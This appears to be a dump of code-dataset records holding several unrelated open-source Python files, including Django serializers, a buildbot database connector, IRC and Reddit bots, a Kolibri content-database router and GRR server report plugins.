repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
skyoo/jumpserver | apps/perms/serializers/asset/user_permission.py | 1 | 2769 | # -*- coding: utf-8 -*-
#
from rest_framework import serializers
from django.utils.translation import ugettext_lazy as _
from assets.models import Node, SystemUser, Asset
from assets.serializers import ProtocolsField
from perms.serializers.asset.permission import ActionsField
__all__ = [
'NodeGrantedSerializer',
'AssetGrantedSerializer',
'ActionsSerializer', 'AssetSystemUserSerializer',
'RemoteAppSystemUserSerializer',
'DatabaseAppSystemUserSerializer',
'K8sAppSystemUserSerializer',
]
class AssetSystemUserSerializer(serializers.ModelSerializer):
"""
查看授权的资产系统用户的数据结构,这个和AssetSerializer不同,字段少
"""
actions = ActionsField(read_only=True)
class Meta:
model = SystemUser
only_fields = (
'id', 'name', 'username', 'priority', 'protocol', 'login_mode',
'sftp_root', 'username_same_with_user',
)
fields = list(only_fields) + ["actions"]
read_only_fields = fields
class AssetGrantedSerializer(serializers.ModelSerializer):
"""
被授权资产的数据结构
"""
protocols = ProtocolsField(label=_('Protocols'), required=False, read_only=True)
platform = serializers.ReadOnlyField(source='platform_base')
class Meta:
model = Asset
only_fields = [
"id", "hostname", "ip", "protocols", "os", 'domain',
"platform", "comment", "org_id", "is_active"
]
fields = only_fields + ['org_name']
read_only_fields = fields
class NodeGrantedSerializer(serializers.ModelSerializer):
class Meta:
model = Node
fields = [
'id', 'name', 'key', 'value', 'org_id', "assets_amount"
]
read_only_fields = fields
class ActionsSerializer(serializers.Serializer):
actions = ActionsField(read_only=True)
# TODO: 删除
class RemoteAppSystemUserSerializer(serializers.ModelSerializer):
class Meta:
model = SystemUser
only_fields = (
'id', 'name', 'username', 'priority', 'protocol', 'login_mode',
)
fields = list(only_fields)
read_only_fields = fields
class DatabaseAppSystemUserSerializer(serializers.ModelSerializer):
class Meta:
model = SystemUser
only_fields = (
'id', 'name', 'username', 'priority', 'protocol', 'login_mode',
)
fields = list(only_fields)
read_only_fields = fields
class K8sAppSystemUserSerializer(serializers.ModelSerializer):
class Meta:
model = SystemUser
only_fields = (
'id', 'name', 'username', 'priority', 'protocol', 'login_mode',
)
fields = list(only_fields)
read_only_fields = fields
| gpl-2.0 | -5,017,376,578,356,509,000 | 27.052083 | 84 | 0.632009 | false | 3.787623 | false | false | false |
denny820909/builder | lib/python2.7/site-packages/buildbot-0.8.8-py2.7.egg/buildbot/db/builds.py | 4 | 2932 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from twisted.internet import reactor
from buildbot.db import base
from buildbot.util import epoch2datetime
class BuildsConnectorComponent(base.DBConnectorComponent):
# Documentation is in developer/database.rst
def getBuild(self, bid):
def thd(conn):
tbl = self.db.model.builds
res = conn.execute(tbl.select(whereclause=(tbl.c.id == bid)))
row = res.fetchone()
rv = None
if row:
rv = self._bdictFromRow(row)
res.close()
return rv
return self.db.pool.do(thd)
def getBuildsForRequest(self, brid):
def thd(conn):
tbl = self.db.model.builds
q = tbl.select(whereclause=(tbl.c.brid == brid))
res = conn.execute(q)
return [ self._bdictFromRow(row) for row in res.fetchall() ]
return self.db.pool.do(thd)
def addBuild(self, brid, number, _reactor=reactor):
def thd(conn):
start_time = _reactor.seconds()
r = conn.execute(self.db.model.builds.insert(),
dict(number=number, brid=brid, start_time=start_time,
finish_time=None))
return r.inserted_primary_key[0]
return self.db.pool.do(thd)
def finishBuilds(self, bids, _reactor=reactor):
def thd(conn):
transaction = conn.begin()
tbl = self.db.model.builds
now = _reactor.seconds()
# split the bids into batches, so as not to overflow the parameter
# lists of the database interface
remaining = bids
while remaining:
batch, remaining = remaining[:100], remaining[100:]
q = tbl.update(whereclause=(tbl.c.id.in_(batch)))
conn.execute(q, finish_time=now)
transaction.commit()
return self.db.pool.do(thd)
def _bdictFromRow(self, row):
def mkdt(epoch):
if epoch:
return epoch2datetime(epoch)
return dict(
bid=row.id,
brid=row.brid,
number=row.number,
start_time=mkdt(row.start_time),
finish_time=mkdt(row.finish_time))
| mit | -2,494,213,062,618,674,700 | 35.65 | 79 | 0.610846 | false | 4 | false | false | false |
peterhogan/python | timer.py | 1 | 1713 | from datetime import datetime
from datetime import timedelta
from time import sleep
from time import strptime
from time import strftime
class Timer(object):
now = datetime.now()
def __init__(self, timevalue):
self.timevalue = timevalue
def inputtime(self):
return datetime.strptime(self.timevalue, "%H:%M:%S %d-%m-%Y")
def printtime(self):
print(self.timevalue)
def countdown(self):
diff = self.inputtime() - self.now
return diff
def timediff(self, value):
diff = self.inputtime() - datetime.strptime(value, "%H:%M:%S %d-%m-%Y")
return diff
def delt(self,days,hours,mins,secs):
timedelt = timedelta(days=days,hours=hours, minutes=mins, seconds=secs)
diff = self.now + timedelt
return diff
def printcountdown(self):
nowseconds = self.now.timestamp()
endseconds = datetime.strptime(self.countdown(), "%H:%M:%S %d-%m-%Y").timestamp()
cntdwn = abs(nowseconds-endseconds)
return cntdwn
time1 = Timer("17:00:00 12-05-2017")
print(time1.delt(0,8.5,0,0))
print(time1.printcountdown())
'''
def timediff(number):
seconds = round(abs(time() - number)) % 60
mins = str(((abs(time() - number)) / 60) % 60).split('.')[0]
hours = str(((abs(time() - number)) / 3600)).split('.')[0]
return {'s': seconds,'m': mins,'h': hours}
def printdiff(tv):
print("Seconds:", timediff(tv)['s'],
"\tMins:", timediff(tv)['m'],
"\tHours:", timediff(tv)['h'],
end='\r', flush=True)
def countdown(timevalue):
return print(timediff(timevalue))
countdown(100)
'''
| mit | 6,972,669,525,992,226,000 | 25.765625 | 89 | 0.583771 | false | 3.495918 | false | false | false |
camconn/probot | plugins/wikipedia.py | 1 | 7061 | #!/usr/bin/env python3
# probot - An asynchronous IRC bot written in Python 3
# Copyright (c) 2016 Cameron Conn
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import json
import requests
#import pprint
import ircpacket as ircp
from irctools import require_public
__plugin_description__ = 'Search wikipedia'
__plugin_version__ = 'v0.1'
__plugin_author__ = 'Cameron Conn'
__plugin_type__ = 'command'
__plugin_enabled__ = True
def get_summary(query: str):
'''
Get the short summary for a search term
query - The term to search for.
'''
BASE = 'https://en.wikipedia.org/w/'
PAGEBASE = BASE + 'index.php'
APIBASE = BASE + 'api.php'
SEARCHBASE = APIBASE + '?action=opensearch&search='
#SEARCHBASE = '{}?action=query&list=search&format=json&srsearch='
DISAMBIGCAT = 'Category:All disambiguation pages'
REDIRBASE = APIBASE + '?action=query&titles={}&redirects&format=json'
headers = {'user-agent': 'probot - An IRC Bot (wiki plugin)'}
# TODO: Use https://en.wikipedia.org/w/api.php?action=query&list=search&srsearch=tape&format=json
# TODO: Use https://en.wikipedia.org/w/api.php?action=query&list=search&srsearch=sigkill&srprop=redirecttitle|redirectsnippet|sectionsnippet|snippet&format=json
query = query.replace(' ', '_')
print('new query: {}'.format(query))
# Determine if there's a redirect
# TODO: Handle fragments
# NOTE: Wikipedia better handles searchs with underscores instead of spaces
redir_req = requests.get(REDIRBASE.format(query), headers=headers)
if redir_req.status_code == 200:
redir_info = json.loads(redir_req.text)
if 'redirects' in redir_info['query']:
print('found redirect!')
#print(redir_info['query']['redirects'])
#print(type(redir_info['query']['redirects']))
query = redir_info['query']['redirects'][0]['to']
print('now using {}'.format(query))
elif 'normalized' in redir_info['query']:
print('normalizing query')
query = redir_info['query']['normalized'][0]['to']
print('now using {}'.format(query))
# Get search info to see if anything matches
#search_page = '{0}{1}'.format(SEARCHBASE, query)
#print('search page: {}'.format(search_page))
search_page = SEARCHBASE + query
s_req = requests.get(search_page, headers=headers)
r_list = None
if s_req.status_code == 200:
r_list = json.loads(s_req.text)
#print('r_list:')
#print(r_list)
else: # Some error occurred
return 'Error: Bad status code: {}'.format(s_req.status_code)
#pprint.pprint(r_list)
#Check if article is disambiguation
category_api = APIBASE + """?action=query""" \
"""&titles={}&prop=categories""" \
"""&format=json&continue=""".format(query)
cat_raw = requests.get(category_api, headers=headers)
article_cat = None
try:
article_cat = json.loads(cat_raw.text)
except Exception:
return None
is_disambig = False
if 'query' not in article_cat:
return None
#if len(r_list) < 1:
# return 'There were no results when searching for "{}"'.format(query)
if 'pages' in article_cat['query']:
pageid_cat = list(article_cat['query']['pages'].keys())[0]
if 'categories' in article_cat['query']['pages'][str(pageid_cat)]:
for cat in article_cat['query']['pages'][str(pageid_cat)]['categories']:
if cat['title'] == DISAMBIGCAT:
is_disambig = True
if is_disambig:
if len(r_list[1]) >= 2:
return 'I\'m sorry. Did you mean: {}?'.format(r_list[1][1])
else:
return 'Sorry, you need to be more specific.'
# If page doesn't exists
if len(r_list[1]) + len(r_list[2]) + len(r_list[3]) == 0:
return 'Sorry, but I found no pages matching that title.'
page_name = r_list[1][0]
page_loc = None
if len(r_list[3]) > 0:
page_loc = r_list[3][0]
#print(page_loc)
# Get summary of article
summary_api = APIBASE + """?action=query&prop=extracts""" \
"""&explaintext&titles={}""" \
"""&exchars=250&format=json""".format(page_name)
summary_req = requests.get(summary_api, headers=headers)
summary_dict = json.loads(summary_req.text)
pageid_sum = list(summary_dict['query']['pages'].keys())[0]
if pageid_sum:
summary = summary_dict['query']['pages'][pageid_sum]['extract'].rstrip()
#print('summary: ')
#print(summary)
#print('type: {}'.format(type(summary)))
#print('end debug')
# Add a link to to page location if we know it.
if '\n' in summary or '\r' in summary:
summary = summary.replace('\r\n', '\n').replace('\r', '\n')
#print('split:')
#print(summary.split('\n'))
#print('end split')
summary = ' '.join(summary.split('\n'))
if page_loc:
summary = '{} [{}]'.format(summary, page_loc)
return summary
else:
return 'Sorry, but I had an error finding a summary of that page.'
@require_public
def wiki_command(arg, packet, shared):
'''
The wiki command
Usage
:w George Washington
:wiki Monty Python
'''
if len(arg) < 2:
return ircp.make_notice('You need to list something to search', packet.sender)
query = ' '.join(arg[1:])
print('search query: "{}"'.format(query))
summary = get_summary(query)
if summary == '...' or summary is None:
return None
elif isinstance(summary, tuple) or isinstance(summary, list):
output = []
for line in summary:
output.append(ircp.make_message(line.strip(), packet.target))
return output
else:
print('summary: ')
print(summary)
print('that was the last time!')
return ircp.make_message(summary, packet.target)
def setup_resources(config: dict, shared: dict):
shared['help']['wiki'] = 'Search for a term on the English Wikipedia || :wiki <query> || :wiki Linus Torvalds'
shared['help']['w'] = 'Alias to :wiki'
shared['cooldown']['wiki'] = 10
shared['cooldown']['w'] = 'wiki'
def setup_commands(all_commands: dict):
all_commands['wiki'] = wiki_command
all_commands['w'] = wiki_command
| agpl-3.0 | -5,288,311,132,269,801,000 | 34.129353 | 164 | 0.610112 | false | 3.656655 | false | false | false |
ralphiee22/kolibri | kolibri/content/content_db_router.py | 2 | 6821 | """
As we store content databases in separate SQLite files per channel, we need dynamic database connection routing.
This file contains a decorator/context manager, `using_content_database`, that allows a specific content
database to be specified for a block of code, as follows:
with using_content_database("nalanda"):
objects = ContentNode.objects.all()
return objects.count()
Thanks to https://github.com/ambitioninc/django-dynamic-db-router for inspiration behind the approach taken here.
"""
import os
import sqlite3
import threading
from functools import wraps
from django.apps import apps
from django.conf import settings
from django.db import DEFAULT_DB_ALIAS, connections
from django.db.utils import ConnectionDoesNotExist
from .errors import ContentModelUsedOutsideDBContext
THREAD_LOCAL = threading.local()
_content_databases_with_attached_default_db = set()
def default_database_is_attached():
alias = get_active_content_database()
return alias in _content_databases_with_attached_default_db
def get_active_content_database(return_none_if_not_set=False):
# retrieve the temporary thread-local variable that `using_content_database` sets
alias = getattr(THREAD_LOCAL, 'ACTIVE_CONTENT_DB_ALIAS', None)
# if no content db alias has been activated, that's a problem
if not alias:
if return_none_if_not_set:
return None
else:
raise ContentModelUsedOutsideDBContext()
# try to connect to the content database, and if connection doesn't exist, create it
try:
connections[alias]
except ConnectionDoesNotExist:
if alias.endswith(".sqlite3"):
filename = alias
else:
filename = os.path.join(settings.CONTENT_DATABASE_DIR, alias + '.sqlite3')
if not os.path.isfile(filename):
raise KeyError("Content DB '%s' doesn't exist!!" % alias)
connections.databases[alias] = {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': filename,
}
# check that the content database is not empty
if not connections[alias].introspection.table_names():
raise KeyError("Content DB '%s' is empty!!" % alias)
# if possible, attach the default database to the content database connection to enable joins
_attach_default_database(alias)
return alias
def _attach_default_database(alias):
"""
Attach the default (primary) database file to the content database connection, if both use sqlite files.
This allows us to do direct joins between tables across the two databases, for efficiently integrating
data from the two sources -- e.g. annotating ContentNodes with progress info from ContentSummaryLogs.
"""
# if the default database uses a sqlite file, we can't attach it
default_db = connections.databases[DEFAULT_DB_ALIAS]
if default_db["ENGINE"].endswith(".sqlite3") and default_db["NAME"].endswith(".sqlite3"):
default_db_path = connections.databases[DEFAULT_DB_ALIAS]["NAME"]
try:
# ensure we're connected to the content database before attaching the default database
if not connections[alias].connection:
connections[alias].connect()
# attach the default database to the content db connection; this allows tables from both databases
# to be used together in the same query; see https://www.sqlite.org/lang_attach.html
connections[alias].connection.execute("ATTACH DATABASE '{}' AS defaultdb;".format(default_db_path))
# record the fact that the default database has been attached to this content database
_content_databases_with_attached_default_db.add(alias)
except sqlite3.OperationalError:
# this will happen if the database is already attached; we can safely ignore
pass
def set_active_content_database(alias):
setattr(THREAD_LOCAL, 'ACTIVE_CONTENT_DB_ALIAS', alias)
class ContentDBRouter(object):
"""A router that decides what content database to read from based on a thread-local variable."""
def _get_db(self, model, **hints):
from .models import ContentDatabaseModel
# if the model does not inherit from ContentDatabaseModel, leave it for the default database
if not issubclass(model, ContentDatabaseModel):
return None
# if the model is already associated with a database, use that database
if hasattr(hints.get("instance", None), "_state"):
return hints["instance"]._state.db
# determine the currently active content database, and return the alias
return get_active_content_database()
def db_for_read(self, model, **hints):
return self._get_db(model, **hints)
def db_for_write(self, model, **hints):
return self._get_db(model, **hints)
def allow_relation(self, obj1, obj2, **hints):
return True
def allow_migrate(self, db, app_label, model_name=None, **hints):
from .models import ContentDatabaseModel
model = apps.get_model(app_label=app_label, model_name=model_name) if model_name else None
# allow migrations for ContentDatabaseModels on non-default DBs, and for others only on default DB
if model and issubclass(model, ContentDatabaseModel):
val = db != DEFAULT_DB_ALIAS
else:
val = db == DEFAULT_DB_ALIAS
return val
class using_content_database(object):
"""A decorator and context manager to do queries on a specific content DB.
:type alias: str
:param alias: The alias for the content database to run queries on.
Usage as a context manager:
.. code-block:: python
from models import ContentNode
with using_content_database("nalanda"):
objects = ContentNode.objects.all()
return objects.count()
Usage as a decorator:
.. code-block:: python
from models import ContentNode
@using_content_database('nalanda')
def delete_all_the_nalanda_content():
ContentNode.objects.all().delete()
"""
def __init__(self, alias):
self.alias = alias
def __enter__(self):
self.previous_alias = getattr(THREAD_LOCAL, 'ACTIVE_CONTENT_DB_ALIAS', None)
set_active_content_database(self.alias)
return self
def __exit__(self, exc_type, exc_value, traceback):
set_active_content_database(self.previous_alias)
def __call__(self, querying_func):
# allow using the context manager as a decorator
@wraps(querying_func)
def inner(*args, **kwargs):
# Call the function in our context manager
with self:
return querying_func(*args, **kwargs)
return inner
| mit | -6,517,660,795,330,440,000 | 36.070652 | 113 | 0.674681 | false | 4.344586 | false | false | false |
d-schmidt/hearthscan-bot | hearthscan-bot.py | 1 | 7345 | #!/usr/bin/env python3
import logging as log
import re
import time
from cardDB import CardDB
from constants import Constants
from helper import HSHelper
from praww import RedditBot
import commentDB
import credentials
import formatter
# answer pms of the same user only every x seconds
PM_RATE_LIMIT = 60
def answerComment(r, comment, answeredDB, helper):
"""read and answer a comment"""
cards, answer = helper.parseText(comment.body)
if cards and answer:
if answeredDB.exists(comment.parent_id, cards):
# send pm instead of comment reply
sub = comment.submission
log.info("sending duplicate msg: %s with %s",
comment.author, cards)
header = formatter.createDuplicateMsg(sub.title, sub.permalink)
message = header + answer
r.redditor(comment.author.name) \
.message('You requested cards in a comment', message)
else:
# reply to comment
log.info("replying to comment: %s %s with %s",
comment.id, comment.author.name, cards)
comment.reply(answer)
def answerMention(r, comment, answeredDB, helper):
"""read and answer a mention"""
cards, answer = helper.parseText(comment.body)
if cards and answer:
if not answeredDB.exists(comment.parent_id, cards):
# reply to comment
log.info("replying to comment: %s %s with %s",
comment.id, comment.author.name, cards)
comment.reply(answer)
else:
log.debug("forwarded mention with id: %s", comment.id)
# forward mentions without cards to admin
subject = '${} /u/{} in /r/{}/ "{}"'.format(comment.id, comment.author,
comment.subreddit, comment.submission.title)
r.redditor(credentials.admin_username).message(subject, comment.body)
def answerSubmission(submission, helper):
"""read and answer a submission"""
text = submission.title
if submission.is_self:
text += ' ' + submission.selftext
cards, answer = helper.parseText(text)
if cards and answer:
log.info("replying to submission: %s %s with %s",
submission.id, submission.author.name, cards)
submission.reply(answer)
def answerPM(r, msg, pmUserCache, helper):
""" read and answer a pm """
subject_author = ""
# subreddit mod pm
if msg.subreddit:
author = msg.subreddit.display_name
subject_author += " /r/" + author
if msg.author:
author = msg.author.name
subject_author += " /u/" + author
log.debug("found message with id: %s from %s", msg.id, author)
if msg.author and not msg.distinguished and author in pmUserCache:
log.debug("user %s is in recent msg list", author)
return
if author == credentials.admin_username and msg.subject[:5] == 're: #':
forwardPMAnswer(r, msg)
return
if author == credentials.admin_username and msg.subject[:5] == 're: $':
forwardMentionAnswer(r, msg)
return
pmUserCache[author] = int(time.time()) + PM_RATE_LIMIT
text = msg.subject + ' ' + msg.body
cards, answer = helper.parseText(text)
# some ui and clients do escape the brackets
if re.search(r'\\?\[\\?\[info\\?\]\\?\]', text):
answer = helper.getInfoText(author) + answer
if cards or answer:
if cards:
log.info("sending msg: %s with %s", author, cards)
msg.reply(answer)
else:
# vip tags (mod, admin usw)
if msg.distinguished:
subject_author += " [" + msg.distinguished + "]"
log.debug("forwarded message with id: %s", msg.id)
# forward messages without cards to admin
subject = '#{}{}: "{}"'.format(msg.id, subject_author, msg.subject)
r.redditor(credentials.admin_username).message(subject, msg.body)
def getIdFromSubject(subject):
first_space = subject.find(' ', 6)
slice_to = first_space if first_space > 1 else len(subject)
if slice_to > 5:
return subject[5:slice_to]
def forwardPMAnswer(r, answer_msg):
"""handle messages from bot admin which are answers to
forwarded messages
"""
message_id = getIdFromSubject(answer_msg.subject)
if message_id:
old_message = r.inbox.message(message_id)
if old_message:
log.debug("forwarded answer to message id: %s", old_message.id)
old_message.reply(answer_msg.body)
answer_msg.reply("answer forwarded")
def forwardMentionAnswer(r, answer_msg):
"""handle messages from bot admin which are answers to
forwarded mentions
"""
comment_id = getIdFromSubject(answer_msg.subject)
if comment_id:
src_comment = r.comment(comment_id)
if src_comment:
log.debug("forwarded answer to comment id: %s", src_comment.id)
src_comment.reply(answer_msg.body)
answer_msg.reply("answer forwarded")
def cleanPMUserCache(cache):
""" clean recent user msg cache """
removeUser = []
now = int(time.time())
for user, utime in cache.items():
if now > utime:
log.debug("removing author %s from recent list", user)
removeUser.append(user)
for ku in removeUser:
del cache[ku]
def main():
log.debug('main() hearthscan-bot starting')
# load constant values
constants = Constants()
# init answered comments sqlite DB
answeredDB = commentDB.DB()
# load card DB
url = 'https://raw.githubusercontent.com/d-schmidt/hearthscan-bot/master/data/tempinfo.json'
cardDB = CardDB(constants=constants, tempJSONUrl=url)
# init hs helper for hearthstone stuff
helper = HSHelper(cardDB, constants)
# pm spam filter cache
pmUserCache = {}
def submissionListener(r, submission):
answerSubmission(submission, helper)
def commentListener(r, comment):
answerComment(r, comment, answeredDB, helper)
def mentionListener(r, comment):
answerMention(r, comment, answeredDB, helper)
def pmListener(r, message):
answerPM(r, message, pmUserCache, helper)
def postAction():
cleanPMUserCache(pmUserCache)
cardDB.refreshTemp()
try:
RedditBot(subreddits=credentials.subreddits,
newLimit=250,
connectAttempts=5,
userBlacklist=set(credentials.userBlacklist)) \
.withSubmissionListener(submissionListener) \
.withCommentListener(commentListener) \
.withMentionListener(mentionListener) \
.withPMListener(pmListener) \
.run(postAction)
except:
log.exception('main() RedditBot failed unexpectedly')
finally:
log.warning('main() leaving hearthscan-bot')
answeredDB.close()
if __name__ == "__main__":
log.basicConfig(filename="bot.log",
format='%(asctime)s %(levelname)s %(module)s:%(name)s %(message)s',
level=log.DEBUG)
log.getLogger('prawcore').setLevel(log.INFO)
log.getLogger('urllib3.connectionpool').setLevel(log.INFO)
# start
try:
main()
except:
log.exception('main() failed unexpectedly')
exit(1) | mit | 6,084,005,707,293,402,000 | 29.106557 | 96 | 0.618652 | false | 3.884188 | false | false | false |
andybalaam/poemtube | server/src/poemtube/api/v1/authentication.py | 1 | 1285 | import base64
import re
import web
from web import webopenid
known_users = {
"user1": "pass1",
"user2": "pass2",
"user3": "pass3",
}
def unathorized():
return web.HTTPError(
"401 Unauthorized",
{
'WWW-Authenticate': 'Basic realm="PoemTube"',
'content-type': 'text/html',
}
)
def authenticate_token( db, authentication_token ):
if authentication_token is None:
return None
if authentication_token in db.tokens:
return db.tokens[authentication_token]["user"]
def authenticate_user( db ):
oid = webopenid.status()
if oid:
return oid
authentication_token = web.cookies().get( "authentication_token" )
user_from_token = authenticate_token( db, authentication_token )
if user_from_token is not None:
return user_from_token
auth = web.ctx.env.get( "HTTP_AUTHORIZATION" )
if auth is None:
return None
user, pw = base64.decodestring( re.sub( "^Basic ", "", auth ) ).split( ":" )
if user in known_users and known_users[user] == pw:
return user
else:
raise unathorized()
def require_authenticated_user( db ):
user = authenticate_user( db )
if user is None:
raise unathorized()
return user
| gpl-2.0 | -796,029,123,556,662,700 | 21.155172 | 80 | 0.61323 | false | 3.735465 | false | false | false |
TheCacophonyProject/Raspberry_Pi_Recorder | CacophonyModules/util.py | 1 | 2242 | import os
import events
import random
import string
import json
import time
import requests
def make_dirs(dirs):
"""Makes the dirs in the list given"""
try:
for d in dirs:
if not os.path.exists(d):
os.makedirs(d)
except OSError as e:
print(e)
return False
return True
def save_data(data, f = None):
"""Saves the data and recording in the toUpload folder."""
# Make folder where the data and file will be saved.
folder = os.path.join("toUpload", rand_str())
if not make_dirs([folder]):
print("Error with making folder when saving data: "+folder)
return False
# Move recording file, if there is one, into the folder made above.
if f != None:
_, ext = os.path.splitext(f)
os.rename(f, os.path.join(folder, "file"+ext))
# Save data as a json file.
with open(os.path.join(folder, "metadata.json"), "w") as jsonFile:
json.dump(data, jsonFile)
# Make new event
events.new_event(events.DATA_TO_UPLOAD, {"folder": folder})
def rand_str(length = 8):
return ''.join(random.sample(string.lowercase + string.digits, length))
def datetimestamp(t = None):
if t == None:
return(time.strftime(format('%Y-%m-%d %H:%M:%S%z')))
else:
return(time.strftime(format('%Y-%m-%d %H:%M:%S%z'), t))
def timestamp():
return(time.strftime(format('%H:%M:%S')))
def inTimeRange(start, end):
now = time.strftime(format('%H:%M'))
start = int(start.split(":")[0])+int(start.split(":")[1])/100.0 #Change '10:23' into 10.23
end = int(end.split(":")[0])+int(end.split(":")[1])/100.0
now = int(now.split(":")[0])+int(now.split(":")[1])/100.0
if (start < end): # range doesn't pass through midnight.
return (start < now and now < end)
else: # Rnage passes throgh midnight.
return (start < now or now < end)
def ping(config):
result = False
url = config.get('server', 'url')
print("Pinging server")
try:
r = requests.get(url+'/ping')
if r.text == 'pong...':
print('Pong...')
result = True
except:
print("Error with connecting to server.")
result = False
return result
| gpl-3.0 | -7,444,512,290,336,446,000 | 28.893333 | 94 | 0.589652 | false | 3.454545 | false | false | false |
pidydx/grr | grr/gui/api_plugins/report_plugins/server_report_plugins.py | 1 | 14271 | #!/usr/bin/env python
"""UI server report handling classes."""
import operator
from grr.gui.api_plugins.report_plugins import rdf_report_plugins
from grr.gui.api_plugins.report_plugins import report_plugin_base
from grr.gui.api_plugins.report_plugins import report_utils
from grr.lib import config_lib
from grr.lib import events
from grr.lib import rdfvalue
from grr.lib.aff4_objects import users as aff4_users
from grr.lib.flows.general import audit
TYPE = rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER
class ClientApprovalsReportPlugin(report_plugin_base.ReportPluginBase):
"""Given timerange's client approvals."""
TYPE = TYPE
TITLE = "Client Approvals"
SUMMARY = "Client approval requests and grants for the given timerange."
REQUIRES_TIME_RANGE = True
USED_FIELDS = ["action", "client", "description", "timestamp", "user"]
TYPES = [
events.AuditEvent.Action.CLIENT_APPROVAL_BREAK_GLASS_REQUEST,
events.AuditEvent.Action.CLIENT_APPROVAL_GRANT,
events.AuditEvent.Action.CLIENT_APPROVAL_REQUEST
]
def GetReportData(self, get_report_args, token):
"""Filter the cron job approvals in the given timerange."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
AUDIT_CHART,
audit_chart=rdf_report_plugins.ApiAuditChartReportData(
used_fields=self.__class__.USED_FIELDS))
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
rows = []
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if event.action in self.__class__.TYPES:
rows.append(event)
except ValueError: # Couldn't find any logs..
pass
except IOError:
pass
rows.sort(key=lambda row: row.timestamp, reverse=True)
ret.audit_chart.rows = rows
return ret
class CronApprovalsReportPlugin(report_plugin_base.ReportPluginBase):
"""Given timerange's cron job approvals."""
TYPE = TYPE
TITLE = "Cron Job Approvals"
SUMMARY = "Cron job approval requests and grants for the given timerange."
REQUIRES_TIME_RANGE = True
USED_FIELDS = ["action", "description", "timestamp", "urn", "user"]
TYPES = [
events.AuditEvent.Action.CRON_APPROVAL_GRANT,
events.AuditEvent.Action.CRON_APPROVAL_REQUEST
]
def GetReportData(self, get_report_args, token):
"""Filter the cron job approvals in the given timerange."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
AUDIT_CHART,
audit_chart=rdf_report_plugins.ApiAuditChartReportData(
used_fields=self.__class__.USED_FIELDS))
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
rows = []
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if event.action in self.__class__.TYPES:
rows.append(event)
except ValueError: # Couldn't find any logs..
pass
except IOError:
pass
rows.sort(key=lambda row: row.timestamp, reverse=True)
ret.audit_chart.rows = rows
return ret
class HuntActionsReportPlugin(report_plugin_base.ReportPluginBase):
"""Hunt actions in the given timerange."""
TYPE = TYPE
TITLE = "Hunts"
SUMMARY = "Hunt management actions for the given timerange."
REQUIRES_TIME_RANGE = True
USED_FIELDS = [
"action", "description", "flow_name", "timestamp", "urn", "user"
]
TYPES = [
events.AuditEvent.Action.HUNT_CREATED,
events.AuditEvent.Action.HUNT_MODIFIED,
events.AuditEvent.Action.HUNT_PAUSED,
events.AuditEvent.Action.HUNT_STARTED,
events.AuditEvent.Action.HUNT_STOPPED
]
def GetReportData(self, get_report_args, token):
"""Filter the hunt actions in the given timerange."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
AUDIT_CHART,
audit_chart=rdf_report_plugins.ApiAuditChartReportData(
used_fields=self.__class__.USED_FIELDS))
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
rows = []
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if event.action in self.__class__.TYPES:
rows.append(event)
except ValueError: # Couldn't find any logs..
pass
except IOError:
pass
rows.sort(key=lambda row: row.timestamp, reverse=True)
ret.audit_chart.rows = rows
return ret
class HuntApprovalsReportPlugin(report_plugin_base.ReportPluginBase):
"""Given timerange's hunt approvals."""
TYPE = TYPE
TITLE = "Hunt Approvals"
SUMMARY = "Hunt approval requests and grants for the given timerange."
REQUIRES_TIME_RANGE = True
USED_FIELDS = ["action", "description", "timestamp", "urn", "user"]
TYPES = [
events.AuditEvent.Action.HUNT_APPROVAL_GRANT,
events.AuditEvent.Action.HUNT_APPROVAL_REQUEST
]
def GetReportData(self, get_report_args, token):
"""Filter the hunt approvals in the given timerange."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
AUDIT_CHART,
audit_chart=rdf_report_plugins.ApiAuditChartReportData(
used_fields=self.__class__.USED_FIELDS))
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
rows = []
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if event.action in self.__class__.TYPES:
rows.append(event)
except ValueError: # Couldn't find any logs..
pass
except IOError:
pass
rows.sort(key=lambda row: row.timestamp, reverse=True)
ret.audit_chart.rows = rows
return ret
